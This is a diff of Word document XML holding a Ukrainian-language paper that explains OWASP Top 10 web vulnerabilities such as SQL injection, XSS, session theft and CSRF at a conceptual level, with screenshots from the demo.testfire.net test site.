+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>містить</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> перелік вразливостей, відсортованих за ступенем їх небезпеки (на першому місці найнебезпечніший тип вразливостей). Список не включає в себе всі можливі типи вразливостей, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>кр</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ім того, часто буває, що ту чи іншу вразливість можна віднести відразу до декількох категорій.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23439,19 +25838,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Ін’єкція коду завжди була однією з найбільш значущих і поширених вразливостей Web-додатків, тому не дивно, що цей тип вразливостей займає верхню строчку списку OWASP. Існує безліч різновидів цієї уразливості, але до сих пір самою сумнозвісною з них є ін’єкція SQL-коду. Вона успішно використовується хакерами протягом більше десяти років. SQL ін'єкція полягає в тому, що зловмисник вводить SQL-команди в поле введення. Якщо код Web-додатка не відфільтровує дані, то на Web-сервері можна запустити </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>SQL-команди і виконувати прямі запити до внутрішньої бази даних в обхід мережевих засобів захисту. Шляхом впровадження SQL-коду зловмисник може дістати таблиці з даними, змінити записи в таблицях і навіть повністю видалити базу даних.</w:t>
+        <w:t>Ін’єкція коду завжди була однією з найбільш значущих і поширених вразливостей Web-додатків, тому не дивно, що цей тип вразливостей займає верхню строчку списку OWASP. Існує безліч різновидів цієї уразливості, але до сих пір самою сумнозвісною з них є ін’єкція SQL-коду. Вона успішно використовується хакерами протягом більше десяти років. SQL ін'єкція полягає в тому, що зловмисник вводить SQL-команди в поле введення. Якщо код Web-додатка не відфільтровує дані, то на Web-сервері можна запустити SQL-команди і виконувати прямі запити до внутрішньої бази даних в обхід мережевих засобів захисту. Шляхом впровадження SQL-коду зловмисник може дістати таблиці з даними, змінити записи в таблицях і навіть повністю видалити базу даних.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23557,6 +25944,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Зловмисник може спробувати вкрасти (несанкціоновано використовувати) Web-сеанс користувача, дізнавшись його секретний ідентифікатор. Знаючи секретний ідентифікатор сеансу, атакуючий може представитися Web-серверу аутентиф</w:t>
       </w:r>
       <w:r>
@@ -23702,19 +26090,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Міжсайтовий скриптинг (cross-site scripting, XSS) - це ще один різновид атаки на Web-додатки, що зберігає популярність вже багато років. Якщо Web-додаток містить XSS-уразливість, то зловмисник може впровадити на Web-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>сторінку шкідливий сценарій, що виконується при завантаженні сторінки користувачем.</w:t>
+        <w:t>Міжсайтовий скриптинг (cross-site scripting, XSS) - це ще один різновид атаки на Web-додатки, що зберігає популярність вже багато років. Якщо Web-додаток містить XSS-уразливість, то зловмисник може впровадити на Web-сторінку шкідливий сценарій, що виконується при завантаженні сторінки користувачем.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23816,7 +26192,13 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -23825,6 +26207,17 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>4. Небезпечні прямі посилання на об'єкти</w:t>
       </w:r>
     </w:p>
@@ -23999,7 +26392,6 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Виведені додатком повідомлення про помилки, дозволяють зловмисникам краще зрозуміти структуру бази даних і підказують, в якому напрямку краще діяти, які команди і сценарії краще намагатися впроваджувати.</w:t>
       </w:r>
     </w:p>
@@ -24077,7 +26469,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -24091,7 +26483,13 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -24100,7 +26498,42 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>7. Відсутність контролю доступу до функціонального рівня</w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">7. Відсутність контролю доступу до функціонального </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>івня</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24148,7 +26581,55 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>-додатком, можуть мати різні рівні повноважень. У таких випадках базова аутентифікація може не впоратися з тим, щоб не допустити використання користувачами повноважень, функцій і даних, доступ до яких їм заборонено.</w:t>
+        <w:t xml:space="preserve">-додатком, можуть мати </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ізні рівні повноважень. У </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>таких</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> випадках базова аутентифікація може не впоратися з тим, щоб не допустити використання користувачами повноважень, функцій і даних, доступ до яких їм заборонено.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24196,7 +26677,31 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> обліковий запис з недостатніми привілеями, може спробувати отримати доступ до закритих функціями (і даними), підбираючи виклики до них.</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>обл</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>іковий запис з недостатніми привілеями, може спробувати отримати доступ до закритих функціями (і даними), підбираючи виклики до них.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24330,19 +26835,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Для захисту від підробки міжсайтових запитів розробники можуть скористатися різними прийомами, включаючи обов'язкове використання в кожному запиті випадкового маркера для перевірки достовірності сеансу або </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>використання випадкових імен п</w:t>
+        <w:t>Для захисту від підробки міжсайтових запитів розробники можуть скористатися різними прийомами, включаючи обов'язкове використання в кожному запиті випадкового маркера для перевірки достовірності сеансу або використання випадкових імен п</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -24545,6 +27038,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:tab/>
       </w:r>
       <w:r>
@@ -25349,7 +27843,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>1.3</w:t>
             </w:r>
           </w:p>
@@ -26904,6 +29397,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -26912,7 +29406,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Для прикладу було викоористано </w:t>
+        <w:t>Для</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> прикладу було викоористано </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -26935,204 +29440,81 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:instrText xml:space="preserve"> HYPERLINK "</w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:instrText>http</w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:instrText>s</w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:instrText>://demo.testfire.net</w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:color w:val="2A2A2A"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E54D54B" wp14:editId="57876880">
-            <wp:extent cx="5940425" cy="3581790"/>
-            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
-            <wp:docPr id="18" name="Рисунок 18"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5940425" cy="3581790"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:instrText xml:space="preserve">" </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="a7"/>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>http</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="a7"/>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="a7"/>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>://demo.testfire.net</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="a7"/>
-          <w:noProof/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04B8050E" wp14:editId="22A69519">
-            <wp:extent cx="5940425" cy="3581790"/>
-            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
-            <wp:docPr id="8" name="Рисунок 8"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5940425" cy="3581790"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:hyperlink r:id="rId14" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a7"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="28"/>
+            <w:szCs w:val="28"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          </w:rPr>
+          <w:t>http</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a7"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="28"/>
+            <w:szCs w:val="28"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:lang w:val="en-US"/>
+          </w:rPr>
+          <w:t>s</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a7"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="28"/>
+            <w:szCs w:val="28"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          </w:rPr>
+          <w:t>://demo.testfire.net</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a7"/>
+            <w:noProof/>
+            <w:lang w:eastAsia="ru-RU"/>
+          </w:rPr>
+          <w:drawing>
+            <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="047D5D68" wp14:editId="587515DA">
+              <wp:extent cx="5940425" cy="3581790"/>
+              <wp:effectExtent l="0" t="0" r="3175" b="0"/>
+              <wp:docPr id="8" name="Рисунок 8"/>
+              <wp:cNvGraphicFramePr>
+                <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+              </wp:cNvGraphicFramePr>
+              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                    <pic:nvPicPr>
+                      <pic:cNvPr id="0" name=""/>
+                      <pic:cNvPicPr/>
+                    </pic:nvPicPr>
+                    <pic:blipFill>
+                      <a:blip r:embed="rId15"/>
+                      <a:stretch>
+                        <a:fillRect/>
+                      </a:stretch>
+                    </pic:blipFill>
+                    <pic:spPr>
+                      <a:xfrm>
+                        <a:off x="0" y="0"/>
+                        <a:ext cx="5940425" cy="3581790"/>
+                      </a:xfrm>
+                      <a:prstGeom prst="rect">
+                        <a:avLst/>
+                      </a:prstGeom>
+                    </pic:spPr>
+                  </pic:pic>
+                </a:graphicData>
+              </a:graphic>
+            </wp:inline>
+          </w:drawing>
+        </w:r>
+      </w:hyperlink>
     </w:p>
     <w:p>
       <w:pPr>
@@ -27201,258 +29583,6 @@
             <wp:extent cx="5940425" cy="3586082"/>
             <wp:effectExtent l="0" t="0" r="3175" b="0"/>
             <wp:docPr id="10" name="Рисунок 10"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5940425" cy="3586082"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
